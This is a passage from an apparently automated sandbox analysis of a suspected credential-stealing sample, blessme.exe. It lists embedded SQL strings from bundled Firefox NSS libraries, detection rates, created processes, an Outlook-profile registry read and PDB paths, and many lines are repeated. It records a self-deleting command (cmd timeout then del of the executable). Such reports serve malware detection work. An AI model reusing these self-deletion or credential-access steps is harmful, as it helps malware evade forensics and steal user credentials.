            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: blessme.exeVirustotal: Detection: 36%
            Source: blessme.exeReversingLabs: Detection: 33%
            Source: blessme.exeVirustotal: Detection: 36%
            Source: blessme.exeReversingLabs: Detection: 33%
            Source: unknownProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\blessme.exeProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe' Jump to behavior
            Source: C:\Users\user\Desktop\blessme.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\blessme.exeProcess created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe' Jump to behavior
            Source: C:\Users\user\Desktop\blessme.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\blessme.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293814970.000000001ECEC000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: blessme.exe, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287786160.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: blessme.exe, 00000001.00000003.286648562.000000001F09C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293768396.000000001ECC0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287278977.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293814970.000000001ECEC000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: blessme.exe, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287786160.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: blessme.exe, 00000001.00000003.286648562.000000001F09C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293768396.000000001ECC0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
